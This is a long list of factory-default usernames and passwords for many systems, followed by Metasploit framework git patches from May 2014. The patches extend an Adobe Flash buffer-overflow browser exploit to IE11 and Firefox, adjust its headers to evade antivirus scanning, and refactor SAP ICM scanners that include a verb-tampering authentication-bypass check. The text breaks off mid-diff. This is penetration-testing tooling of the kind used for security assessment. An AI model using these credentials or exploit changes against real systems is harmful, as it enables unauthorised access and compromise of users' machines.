FAXWORKS -admin password1 -EXFSYS EXFSYS -4Dgifts -JMUSER JMUSER -admin imsa7.0 -SUPERVISOR NETFRAME -CIS CIS -UNITY_ - ciscofw -HLW HLW -admin brocade1 -pwrchute pwrchute - setup - Tiny -IDMSSE -postgres svcPASS83 -NSA nsa -!root !ishtar -admin blank -root NeXT -TELEDEMO TELEDEMO - AMIDECOD -recover recover -TRAVEL TRAVEL -lexar - efmukl -viewer -LIBRARY -admin raritan -PO8 PO8 -root@localhost root -NAMES NAMES -secofr secofr -PDMREMI - biostar -MGE VESOFT -USER7 USER7 -OWA_PUBLIC OWA_PUBLIC -questra questra -builtin builtin -SFCNTRL -SAP* 6071992 -boss boss -anonymous password - isolation - Q54arwms -PLEX PLEX -OLAPDBA OLAPDBA - g6PJ -OLAPSVR INSTANCE -user_expert demo -root pixmet2003 -Bhosda Lund -TEST -qsvr ibmcel -CMSBATCH CMSBATCH - ABCD -gropher - AM -administrator admin - condo - Toshiba - familymacintosh -TAHITI TAHITI -NEWINGRES NEWINGRES - AMI?SW - mMmM -man man -VM3812 -root powerapp -ibm service -VIF_DEVELOPER VIF_DEV_PWD -ADMIN WELCOME -Admin Barricade -joeuser joeuser -system isp -IPC -HELPDESK HELPDESK -wlpisystem wlpisystem -TSAFVM -prtgadmin prtgadmin -SYSTEM CHANGE_ON_INSTALL - CONCAT - t0ch88 -webmaster webmaster - djonet -ADMIN changeme -Any - Compaq -UAMIS_ -theman changeit -CISINFO CISINFO -mobile dottie -QS_CB QS_CB -CDEMORID CDEMORID -tech nician -DEMO2 -administrator none -SYS MANAG3R -End User 7936 -PORTAL30_PUBLIC PORTAL30_PUBLIC -sysadmin nortel -SYS D_SYSTPW -SYSTEM SYSPASS -Guest blank -User User -MDDEMO_CLERK CLERK -FIELD FIELD -Admin SECRET123 -Guest Guest -PHANTOM -admin amigosw1 - xmux -write -ADMINISTRATOR SENTINEL -system field - ducati900ss -qsecofr 22222222 - lkw peter - awkward - TzqF -SYSTEST_CLIG SYSTEST_CLIG -ODS ODS -admin axis2 -BLAKE PAPER -TSDEV TSDEV -PRODBM -admin letmein - joh316 -dos dos -login 0000 -APL2PP -system hdms -admin phplist -god1 12345 -admin novell -CICSUSER CISSUS -22222222 22222222 -root passw0rd -user_publisher demo -OSE$HTTP$ADMIN (random password) -def trade -SuperUser kronites -QS_CBADM QS_CBADM -SYSA SYSA - 00000000 -STUDENT STUDENT -Draytek 1234 -SMDR SECONDARY -EREP -VSEMAN - OOOOOOOO -primos_cs prime -demo -fwadmin xceladmin - j64 -MTS_USER MTS_PASSWORD - AWARD_SW -AQDEMO AQDEMO -private ReadWrite access secret - GWrv - MagiMFP - SnuFG5 -IS_$hostname IS_$hostname -HPSupport badg3r5 -ORASSO ORASSO -GATEWAY - t0ch20x -CVIEW -SH SH - zeosx -XXSESS_MGRYY X#1833 - wodj - FOOBAR -SYSMAN SYSMAN -VMMAP -admin urchin -PORTAL30_DEMO PORTAL30_DEMO -Ezsetup -QS_CS QS_CS -administrator PlsChgMe! -CMSUSER - MCUrv -DEMO1 -admin adminadmin -userNotUsed userNotU - AMI~ -root ibm -ncadmin ncadmin -TESTPILOT TESTPILOT - Polrty -fg_sysadmin password -UETP UETP -QS QS -DBI MUMBLEFRATZ -  ILMI -SYSTEM SYS -JWARD AIROPLANE -APPS_MRC APPS_MRC - uboot -Moe hello -SENTINEL SENTINEL -admin netgear1 -Yak asd123 -PDP11 PDP11 - aammii -Flo hello -SLIDE SLIDEPW -root bagabu -primeos primeos - Spacve - 256256 -INFO INFO -checkfsys checkfsys -PRODCICS PRODCICS - foolproof - AWARD_PW -MXAGENT MXAGENT -SYSTEM ORACLE8I -admin no password -VMTLIBR -POWERCARTUSER POWERCARTUSER -VMBACKUP -CPNUC - QDI - shiva -distrib distrib0 -SUPERVISOR SUPERVISOR -SYSMAINT SERVICE -MIGRATE MIGRATE -CDEMOUCB CDEMOUCB -system prime -QSRV 22222222 - c -OLTSEP -sysbin sysbin -signa signa -autocad autocad - SWITCHES_SW -WEBDB WEBDB -daemon - aPAf -ncrm ncrm -SAMPLE SAMPLE - 1 -HCPARK HCPARK -ALLINONE ALLINONE -nm2user nm2user -SAVSYS -IIPS -PATROL PATROL - technolgi - MBIU0 -mailadmin secret -adm adm -TMSADM -tutor tutor -ESubscriber -CHEY_ARCHSVR CHEY_ARCHSVR -write synnet -software software -admin welcome -god2 12345 -bbs bbs - Dell -disttech disttech -FSFTASK2 - zbaaaca - prost -ORDSYS ORDSYS -Administrator administrator - 1234567890 -gopher gopher -PSFMAINT -SYSTEM MANAG3R - RM - s!a@m#n$p%c -EAdmin -12345 12345 -DECNET DECNET -OPERATIONS OPERATIONS -$system -REP_OWNER DEMO -PANAMA PANAMA -LIBRARIAN SHELVES -SYSTEM 0RACLE -fal -4Dgifts 4Dgifts - biosstar -NETSERVER NETSERVER - tiny -root TANDBERG -POWERCHUTE APC -USER5 USER5 -GPFD GPFD - 12345678 -blank admin -QS_OS QS_OS -sysadm admin -REPADMIN REPADMIN -Administrator 12345678 -0 0 -DEMO8 DEMO8 -DEMO9 DEMO9 -CDEMO82 CDEMO82 -admin boca raton -Administrator vision2 -administrator 0 -umountsys umountsys -snmp snmp -Username PASSWORD -volition -USER0 USER0 -CDEMOCOR CDEMOCOR -SYSTEST UETP -Rodopi Rodopi -DECNET NONPRIV -user_checker demo - tatercounter2000 -qserv qserv - ESSEX or IPC -AQ AQ -support -SAPR3 SAP -VRR1 VRR1 -fastwire fw -admi admin -FINANCE FINANCE -WinCCAdmin 2WSXcder -ESTOREUSER ESTORE -fax fax -VIRUSER VIRUSER -LINK LINK -APPLSYSPUB FNDPUB - BIOS -SYS ORACLE8 -SYS ORACLE9 -overseer overseer -checksys checksys -umountfs umountfs -DBDCCICS DBDCCIC -Admin password - x6zynd56 -TOAD TOAD -root mozart -ntpupdate ntpupdate -root router -MDDEMO_MGR MGR -ARCHIVIST -SUPERVISOR HARRIS - 11111 -billy-bob -lp bin -DECMAIL DECMAIL -alien alien -admin dnnadmin -nsroot nsroot -AdvWebadmin advcomm500349 -dvstation dvst10n -SERVICECONSUMER1 SERVICECONSUMER1 -MMO2 MMO2 -qsecofr 11111111 -NOC NOC -WWWUSER WWWUSER -root Serial port only -SAP SAPR3 -root t0talc0ntr0l4! -NEVIEW -MAIL -ODSCOMMON ODSCOMMON -fal fal -pixadmin pixadmin -ripeop -PENG - BIOSPASS -netlink netlink -L2LDEMO L2LDEMO -OUTLN OUTLN -12.x -scott tiger or tigger - toshy99 -dbase dbase - nz0u4bbe -fam fam - bell9 -Oper Oper -RMAIL RMAIL -administrator 19750407 -FND FND -admin exinda -PRIV PRIV -admin barney -SETUP - biodata - 24Banc81 -news news -VSEIPO - j09F -pw pw -GUEST -ilon ilon - award_? -SYS 0RACLE39 -SYS 0RACLE38 -DEFAULT DEFAULT - AMI!SW -PLSQL SUPERSECRET -root alpine -politcally correct -18140815 18140815 -APPUSER APPUSER -SUPERVISOR -CENTRA CENTRA -LBACSYS LBACSYS - alfarome -PDP8 PDP8 -SFCMI -administrator * * # -lpadm lpadm -Test Everything -bewan bewan - 2580 -DIP DIP - Sxyz -mfd mfd -MDDEMO MDDEMO - intermec - 589589 -SWPRO SWPRO -DES DES -root fibranne -Coco hello -GCS -rodopi rodopi - touchpwd= -Scott Tiger -Admin5 4tugboat -admin funkwerk -ANDY SWORDFISH -DESQUETOP -nobody -Manager 657 - mysweex -SYSTEM SYSLIB -NETCON NETCON -JONES STEEL -author author -MOESERV -web web -tech User -PUBSUB1 PUBSUB1 -SYS D_SYSPW -CATALOG CATALOG - IBM - Guest -SQLUSER -RE RE -REPORTS_USER OEM_TEMP -MFG MFG -POST POST -HPLASER HPLASER -HR HR -VIDEOUSER VIDEO USER -DBA SQL - CMOSPWD -guest1 guest -superuser asante -SYSTEM 0RACLE38 -SYSTEM 0RACLE39 -AUTOLOG1 -dadmin dadmin -AURORA$JIS$UTILITY$ -wlcsystem wlcsystem -news -CPRM From 97b63d708c992d74833cd6fcc1a00ad4824aabe0 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 18:18:23 +0200 Subject: [PATCH 336/853] Corrected naming to be in line with msf convention --- ...r_services_unhash.txt => default_pass_for_services_unhash.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename data/wordlists/{default_passwords_for_services_unhash.txt => default_pass_for_services_unhash.txt} (100%) diff --git a/data/wordlists/default_passwords_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt similarity index 100% rename from data/wordlists/default_passwords_for_services_unhash.txt rename to data/wordlists/default_pass_for_services_unhash.txt From c9bb2d516565331f93e8a4c1af85848dc474b20b Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 20:55:50 +0200 Subject: [PATCH 337/853] Added headers to files --- data/wordlists/default_pass_for_services_unhash.txt | 3 +++ data/wordlists/default_userpass_for_services_unhash.txt | 3 +++ data/wordlists/default_users_for_services_unhash.txt | 3 +++ 3 files changed, 9 insertions(+) diff --git a/data/wordlists/default_pass_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt index 7203bcda29..6ad340cf2a 100644 --- a/data/wordlists/default_pass_for_services_unhash.txt +++ b/data/wordlists/default_pass_for_services_unhash.txt @@ -1,3 +1,6 @@ +# Default passwords from the unhash project. Useful for finding out +# factory default passwords in embedded devices or services. +# http://github.com/tkisason/unhash admin password diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt index ff0458f94b..c83ece0a21 100644 --- a/data/wordlists/default_userpass_for_services_unhash.txt +++ b/data/wordlists/default_userpass_for_services_unhash.txt @@ -1,3 +1,6 @@ +# Default user/passwords from the unhash project. Useful for finding out +# factory default passwords in embedded devices or services. +# http://github.com/tkisason/unhash admin admin admin diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt index c36f0e7e2b..3ba04c3750 100644 --- a/data/wordlists/default_users_for_services_unhash.txt +++ b/data/wordlists/default_users_for_services_unhash.txt @@ -1,3 +1,6 @@ +# Default users from the unhash project. Useful for finding out +# factory default passwords in embedded devices or services. +# http://github.com/tkisason/unhash admin root From 9b29c572a7c1a6ade4184261c56919fca1debd9f Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 21:14:17 +0200 Subject: [PATCH 338/853] Comments dont work with auth_brute.rb --- data/wordlists/default_pass_for_services_unhash.txt | 3 --- data/wordlists/default_userpass_for_services_unhash.txt | 3 --- data/wordlists/default_users_for_services_unhash.txt | 3 --- 3 files changed, 9 deletions(-) diff --git a/data/wordlists/default_pass_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt index 6ad340cf2a..7203bcda29 100644 --- a/data/wordlists/default_pass_for_services_unhash.txt +++ b/data/wordlists/default_pass_for_services_unhash.txt @@ -1,6 +1,3 @@ -# Default passwords from the unhash project. Useful for finding out -# factory default passwords in embedded devices or services. -# http://github.com/tkisason/unhash admin password diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt index c83ece0a21..ff0458f94b 100644 --- a/data/wordlists/default_userpass_for_services_unhash.txt +++ b/data/wordlists/default_userpass_for_services_unhash.txt @@ -1,6 +1,3 @@ -# Default user/passwords from the unhash project. Useful for finding out -# factory default passwords in embedded devices or services. -# http://github.com/tkisason/unhash admin admin admin diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt index 3ba04c3750..c36f0e7e2b 100644 --- a/data/wordlists/default_users_for_services_unhash.txt +++ b/data/wordlists/default_users_for_services_unhash.txt @@ -1,6 +1,3 @@ -# Default users from the unhash project. Useful for finding out -# factory default passwords in embedded devices or services. -# http://github.com/tkisason/unhash admin root From 033757812d3879f646a3206f1552742b532551b2 Mon Sep 17 00:00:00 2001 From: Jonas Vestberg <bugch3ck@users.noreply.github.com> Date: Sun, 18 May 2014 22:43:51 +0200 Subject: [PATCH 339/853] Updates to adobe_flash_pixel_bender_bof: 1. Added embed-element to work with IE11 (and Firefox). Removed browser-requirements for ActiveX (clsid and method). 2. Added Cache-Control header on SWF-download to avoid AV-detection (no disk caching = no antivirus-analysis :). Testing performed: Successfully tested with Adobe Flash Player 13.0.0.182 with IE9, IE10 and IE11 running on Windows 7SP1. (Exploit will trigger on FF29, although sandboxed.) --- .../windows/browser/adobe_flash_pixel_bender_bof.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 43997895ef..9c28caa2f8 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module - has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over - Windows XP SP3, Windows 7 SP1 and Windows 8. + has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 + over Windows XP SP3, Windows 7 SP1 and Windows 8. }, 'License' => MSF_LICENSE, 'Author' => @@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", - :method => "LoadMovie", + #:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + #:method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => Msf::HttpClients::IE, + #:ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote if request.uri =~ /\.swf$/ print_status("Sending SWF...") - send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end @@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=flash_payload%>" /> <param name="Play" value="true" /> + <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/> </object> </body> </html> From 975cdcb53758a1aeb6329a0a5c08b9174a2c8a68 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Sun, 18 May 2014 23:24:01 -0500 Subject: [PATCH 340/853] Allow exploitation also on FF --- .../windows/browser/adobe_flash_pixel_bender_bof.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 9c28caa2f8..0d03d85173 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'InitialAutoRunScript' => 'migrate -f', + # Disabled by default to allow sessions on Firefox, still useful when exploiting IE + #'InitialAutoRunScript' => 'migrate -f', 'Retries' => false, 'EXITFUNC' => "thread" }, @@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - #:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", - #:method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, - #:ua_name => Msf::HttpClients::IE, + :ua_name => lambda { |ua| print_status(ua); ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => From 2fb0dbb7f8fbc14552a0dd91d007ae01cf06713f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Sun, 18 May 2014 23:34:04 -0500 Subject: [PATCH 341/853] Delete debug print_status --- .../exploits/windows/browser/adobe_flash_pixel_bender_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 0d03d85173..c29080ed3c 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => lambda { |ua| print_status(ua); ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, + :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => From e59f104195f37146cadf3151b32591bfd9153f9b Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 10:41:01 +0100 Subject: [PATCH 342/853] Use unless --- .../auxiliary/scanner/sap/sap_icm_urlscan.rb | 144 ++++++++++-------- 1 file changed, 80 insertions(+), 64 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 870936569c..87246442be 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -30,143 +29,160 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]), - OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"]) + OptPath.new('URLFILE', [true, "SAP ICM Paths File", + File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')]) ], self.class) end # Base Structure of module borrowed from jboss_vulnscan def run_host(ip) - # If URLFILE is set empty, obviously the user made a silly mistake - if datastore['URLFILE'].empty? - print_error("Please specify a URLFILE") - return - end - - # Initialize the actual URLFILE path - if datastore['URLFILE'] == "sap_icm_paths.txt" - url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}" - else - # Not the default sap_icm_paths file - url_file = datastore['URLFILE'] - end - - # If URLFILE path doesn't exist, no point to continue the rest of the script - if not File.exists?(url_file) - print_error("Required URL list #{url_file} was not found") - return - end - - res = send_request_cgi( + res = send_request_cgi( { 'uri' => "/" + Rex::Text.rand_text_alpha(12), 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) + }) if res print_status("Note: Please note these URLs may or may not be of interest based on server configuration") @info = [] - if not res.headers['Server'].nil? + if res.headers['Server'] @info << res.headers['Server'] print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}") else print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header") end - if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) ) + if (res.body && /class="note">(.*)code:(.*)</i.match(res.body) ) print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}") end # Load URLs - urls_to_check = [] - File.open(url_file) do |f| + urls_to_check = check_urlprefixes + File.open(datastore['URLFILE']) do |f| f.each_line do |line| urls_to_check.push line end end print_status("#{rhost}:#{rport} Beginning URL check") + @valid_urls = '' urls_to_check.each do |url| check_url(url.strip) end - # check custom URLs - check_urlprefixes else print_error("#{rhost}:#{rport} No response received") end + if @valid_urls.length > 0 + l = store_loot( + 'sap.icm.urls', + "text/plain", + datastore['RHOST'], + @valid_urls, + "icm_urls.txt", "SAP ICM Urls" + ) + print_line + print_good("Stored urls as loot: #{l}") if l + end end def check_url(url) + full_url = write_url(url) res = send_request_cgi({ - 'uri' => url, + 'uri' => normalize_uri(url), 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) + }) if (res) - if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil? - print_good("New server header seen [#{res.headers['Server']}]") - @info << res.headers['Server'] #Add To seen server headers + if res.headers['Server'] + unless @info.include?(res.headers['Server']) + print_good("New server header seen [#{res.headers['Server']}]") + @info << res.headers['Server'] #Add To seen server headers + end end - case - when res.code == 200 - print_good("#{rhost}:#{rport} #{url} - does not require authentication (200) (length: #{res.headers['Content-Length']})") - when res.code == 403 - print_good("#{rhost}:#{rport} #{url} - restricted (403)") - when res.code == 401 - print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}") + case res.code + when 200 + print_good("#{full_url} - does not require authentication (#{res.code})") + @valid_urls << full_url << "\n" + when 403 + print_status("#{full_url} - restricted (#{res.code})") + when 401 + print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}") # Attempt verb tampering bypass bypass_auth(url) - when res.code == 404 + when 404 # Do not return by default, only display in verbose mode - vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)") - when res.code == 500 - print_good("#{rhost}:#{rport} #{url} - produced a server error (500)") - when res.code == 301, res.code == 302 - print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)") + vprint_status("#{full_url} - not found (#{res.code})") + when 400,500 + print_status("#{full_url} - produced a server error (#{res.code})") + when 301, 302 + print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") + @valid_urls << full_url << "\n" + when 307 + vprint_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") else - vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}") + print_error("#{full_url} - unhandled response code #{res.code}") + @valid_urls << full_url << "\n" end else - print_status("#{rhost}:#{rport} #{url} - not found (No Response code Received)") + vprint_status("#{full_url} - not found (No Repsonse code Received)") end end + def write_url(path) + if datastore['SSL'] + protocol = 'https://' + else + protocol = 'http://' + end + + "#{protocol}#{rhost}:#{rport}#{path}" + end + def bypass_auth(url) - print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})") + full_url = write_url(url) + vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})") res = send_request_raw({ - 'uri' => url, + 'uri' => normalize_uri(url), 'method' => datastore['VERB'], 'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason - }, 20) + }) - if (res and res.code == 200) - print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering (length: #{res.headers['Content-Length']})") + if (res && res.code == 200) + print_good("#{full_url} Got authentication bypass via HTTP verb tampering") + @valid_urls << full_url << "\n" else - print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") + vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end end + # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. + # This is how the message server finds out which URLs must be forwarded where. + # (SAP help) -> this disclose custom URLs that are also checked for authentication def check_urlprefixes - # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. This is how the message server finds out which URLs must be forwarded where." (SAP help) - # -> this disclose custom URLs that are also checked for authentication + urls = [] res = send_request_cgi({ 'uri' => "/sap/public/icf_info/urlprefix", 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) - if (res and res.code == 200) + }) + + if (res && res.code == 200) res.body.each_line do |line| if line =~ /PREFIX=/ url_enc = line.sub(/^PREFIX=/, '') + # Remove CASE and VHOST + url_enc = url_enc.sub(/&CASE=.*/, '') url_dec = URI.unescape(url_enc).sub(/;/, '') - check_url(url_dec.strip) + urls << url_dec.strip end end + else + print_error("#{rhost}:#{rport} Could not retrieve urlprefixes") end + + urls end end From 88b7dc3def814bb390a62d2e42a473fedae8a062 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 10:46:47 +0100 Subject: [PATCH 343/853] re-add content length --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 87246442be..a2be50da68 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary case res.code when 200 - print_good("#{full_url} - does not require authentication (#{res.code})") + print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})") @valid_urls << full_url << "\n" when 403 print_status("#{full_url} - restricted (#{res.code})") From 5d96f54410a0e6630dfb2e1f71f1ac5212073693 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 10:52:06 +0100 Subject: [PATCH 344/853] Be verbose about 307 --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index a2be50da68..cd3116d67c 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -116,11 +116,11 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{full_url} - not found (#{res.code})") when 400,500 print_status("#{full_url} - produced a server error (#{res.code})") - when 301, 302 + when 301, 302, print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") @valid_urls << full_url << "\n" when 307 - vprint_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") + print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") else print_error("#{full_url} - unhandled response code #{res.code}") @valid_urls << full_url << "\n" From 848227e18ab9a32bb7dcf5ac976844631c5cb26b Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 10:59:38 +0100 Subject: [PATCH 345/853] 401 should be a valid url --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index cd3116d67c..7c26bbd1dc 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -109,6 +109,7 @@ class Metasploit3 < Msf::Auxiliary print_status("#{full_url} - restricted (#{res.code})") when 401 print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}") + @valid_urls << full_url << "\n" # Attempt verb tampering bypass bypass_auth(url) when 404 @@ -153,7 +154,6 @@ class Metasploit3 < Msf::Auxiliary if (res && res.code == 200) print_good("#{full_url} Got authentication bypass via HTTP verb tampering") - @valid_urls << full_url << "\n" else vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end From 6b1e4c3a9de966272c75fb13687fdba6191494d7 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 11:17:58 +0100 Subject: [PATCH 346/853] Show loot and error code --- .../sap/sap_mgmt_con_getprocessparameter.rb | 28 ++++++------------- 1 file changed, 9 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index 8fbb4cc489..201e252d19 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -30,7 +30,7 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(50013), - OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), + OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']), OptString.new('MATCH', [false, 'Display matches e.g login/', '']), ], self.class) register_autofilter_ports([ 50013 ]) @@ -38,16 +38,6 @@ class Metasploit4 < Msf::Auxiliary end def run_host(ip) - res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET' - }, 25) - - if not res - print_error("#{rhost}:#{rport} [SAP] Unable to connect") - return - end - getprocparam(ip) end @@ -75,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary begin res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']), + 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', 'data' => data, 'headers' => @@ -84,9 +74,9 @@ class Metasploit4 < Msf::Auxiliary 'SOAPAction' => '""', 'Content-Type' => 'text/xml; charset=UTF-8', } - }, 30) + }) - if not res + unless res print_error("#{rhost}:#{rport} [SAP] Unable to connect") return end @@ -100,7 +90,7 @@ class 